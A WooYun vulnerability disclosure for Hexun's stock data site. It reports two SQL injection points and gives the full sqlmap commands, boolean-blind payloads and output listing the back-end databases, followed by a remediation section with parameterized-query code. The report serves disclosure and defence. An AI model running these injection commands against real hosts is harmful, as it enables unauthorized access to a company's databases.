WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
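2013-10-29: Details reported to the vendor; awaiting vendor handling
2013-10-29: Vendor confirmed; details disclosed to the vendor only
2013-11-08: Details disclosed to core white hats and experts in related fields
2013-11-18: Details disclosed to regular white hats
2013-11-28: Details disclosed to intern white hats
2013-12-13: Details disclosed to the public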
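Two SQL injection issues; see the details.
Core data, 10 databases; the tables were not enumerated! This report only notifies that the injection points exist; no further testing was done!
#1==============================================================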
The GET parameters endDate and startDate are both injectable.
http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01

python sqlmap.py -u "http://stockdata.stock.hexun.com/xsjj/data/sumsearch.aspx?callback=hxbase_json0&count=30&endDate=2013-10-31&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01" --batch --dbs

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: endDate
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=hxbase_json0&count=30&endDate=2013-10-31' AND 6923=6923 AND 'xnWM'='xnWM&page=1&searchContent=%C7%EB%CA%E4%C8%EB%B9%C9%C6%B1%B4%FA%C2%EB/%C3%FB%B3%C6&startDate=2013-10-01
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] DB_BASE
[*] DB_FUND
[*] DB_STOCK
[*] DB_STOCKDATA
[*] DB_VALUEADD
[*] DB_WEB
[*] master
[*] model
[*] msdb
[*] tempdb
#2==============================================================
The GET parameter code is injectable.
http://stockdata.stock.hexun.com/dzjy/outdata/ggdzjy.ashx?callback=hxbase_json13829729832941&cjd=180&code=000001&count=30&page=1

python sqlmap.py -u "http://stockdata.stock.hexun.com/dzjy/outdata/ggdzjy.ashx?callback=hxbase_json13829729832941&cjd=180&code=000001&count=30&page=1" -p "code" --batch --dbs

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=hxbase_json13829729832941&cjd=180&code=000001 AND 1853=1853&count=30&page=1
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] DB_BASE
[*] DB_FUND
[*] DB_STOCK
[*] DB_STOCKDATA
[*] DB_VALUEADD
[*] DB_WEB
[*] master
[*] model
[*] msdb
[*] tempdb
Filter the input.
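One way to close the two injection points reported above, added here as an example and not taken from the report or the vendor's code: each parameter is checked against a strict type (calendar date, fixed-length numeric code) and the values are then bound as query parameters instead of being concatenated into SQL. Python with an in-memory SQLite table stands in for the ASP.NET / SQL Server 2005 back end; the `trades` table, the function names and the six-digit code rule are assumptions, and one hypothetical handler combines the parameters of both endpoints.

```python
import re
import sqlite3
from datetime import datetime
from urllib.parse import parse_qs

DATE_RE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
CODE_RE = re.compile(r"[0-9]{6}")  # assumption: six-digit codes, as in code=000001


def clean_date(value):
    """Return an ISO date string, or raise ValueError for anything else."""
    if not DATE_RE.fullmatch(value):
        raise ValueError("date must be YYYY-MM-DD")
    # strptime also rejects well-formed but impossible dates such as 2013-02-30
    return datetime.strptime(value, "%Y-%m-%d").date().isoformat()


def clean_code(value):
    """Return the code unchanged if it is exactly six ASCII digits."""
    if not CODE_RE.fullmatch(value):
        raise ValueError("code must be six digits")
    return value


def search_trades(conn, query_string):
    """Validate every parameter, then bind the values; no SQL text is built from input."""
    qs = parse_qs(query_string, keep_blank_values=True)
    try:
        code = clean_code(qs["code"][0])
        start = clean_date(qs["startDate"][0])
        end = clean_date(qs["endDate"][0])
    except (KeyError, ValueError):
        return None  # caller answers HTTP 400 and logs the rejected request
    sql = ("SELECT code, trade_date, volume FROM trades "
           "WHERE code = ? AND trade_date BETWEEN ? AND ? ORDER BY trade_date")
    return conn.execute(sql, (code, start, end)).fetchall()


def demo_db():
    """Constructed sample data in a hypothetical table, for the demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE trades (code TEXT, trade_date TEXT, volume INTEGER)")
    conn.executemany("INSERT INTO trades VALUES (?, ?, ?)", [
        ("000001", "2013-10-08", 1200),
        ("000001", "2013-11-02", 900),
        ("600000", "2013-10-15", 500),
    ])
    return conn
```

Validation alone would already reject both payloads shown in the sqlmap output; binding the values keeps the query safe even if a validation rule is later loosened.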
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2013-10-29 15:16
Thanks for letting us know.
None yet.